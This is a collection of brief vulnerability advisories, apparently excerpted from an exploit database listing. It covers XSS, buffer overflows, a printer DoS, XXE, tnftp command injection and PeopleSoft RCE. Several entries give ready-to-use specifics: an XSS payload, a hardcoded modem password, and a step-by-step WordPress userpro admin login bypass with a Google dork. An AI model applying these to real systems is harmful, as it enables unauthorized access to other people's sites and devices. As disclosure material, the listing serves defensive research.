Access and go to the favorites tab and add a new favorite. Add script as the value of the field. Payload : <script> alert(1)</script> Script saved and gives a pop-up to user every time they access that page. Therefore, Persistent XSS.
SoftConsole.exe does not check bounds when reading server response on making an outbound connection, resulting in a classic Buffer Overflow exploit. Avaya IP Office user must connect to a malicious server where a remote attacker can then deliver the buffer overflow payload in the server response, exploiting the SoftConsole client. This vulnerability allows attackers to deliver and execute arbitrary attacker supplied code on the Avaya host system.
The Debut embedded http server contains a remotely exploitable denial of service where a single malformed HTTP POST request can cause the server to hang until eventually replying with an HTTP 500 error. While the server is hung, print jobs over the network are blocked and the web interface is inaccessible. An attacker can continuously send this malformed request to keep the device inaccessible to legitimate traffic.
The Actiontec C1000A Modem provided by CenturyLink has hardcoded passwords. This is similar to another recent submission by Matthew Shiemo, who inspired me to check the device I use. Proof of Concept: telnet 192.168.0.1 and login with admin/CenturyL1nk.
The userpro plugin has the ability to bypass login authentication for the user 'admin'. If the site does not use the standard username 'admin' it is not affected. PoC: 1 - Google Dork inurl:/plugins/userpro 2 - Browse to a site that has the userpro plugin installed. 3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true 4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in will full administrator access.
Jnes Version 1.0.2 is vulnerable to a stack buffer overflow vulnerability. An attacker can exploit this vulnerability by loading a malicious ROM file and then going to the options - cheats - add - Pro-Action Replay menu. The attacker can then paste the contents of the open.txt file in the box <address>-<value> and click on ok. This will cause a buffer overflow and allow the attacker to execute arbitrary code on the vulnerable system.
A buffer overflow vulnerability exists in Ipswitch WS_FTP Professional version 12.6.03. An attacker can exploit this vulnerability by sending a specially crafted payload to the search field, which can be used to overwrite the SEH and execute arbitrary code. The payload can be generated using a script, and the shellcode can be replaced with 'Ds' in the search field.
Attackers who can send SOAP messages to a Ladon webservice via the HTTP interface of the Ladon webservice can exploit an XML external entity expansion vulnerability and read local files, forge server side requests or overload the service with exponentially growing memory payloads.
This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource. If tnftp is executed without the -o command-line option, it will resolve the output filename from the last component of the requested resource. If the output filename begins with a "|" character, tnftp will pass the fetched resource's output to the command directly following the "|" character through the use of the popen() function.
This exploit is used to gain Remote Code Execution on Oracle PeopleSoft systems. It uses XXE to upload a malicious payload to the target system, which is then used to execute arbitrary commands on the target system.
Services By CQR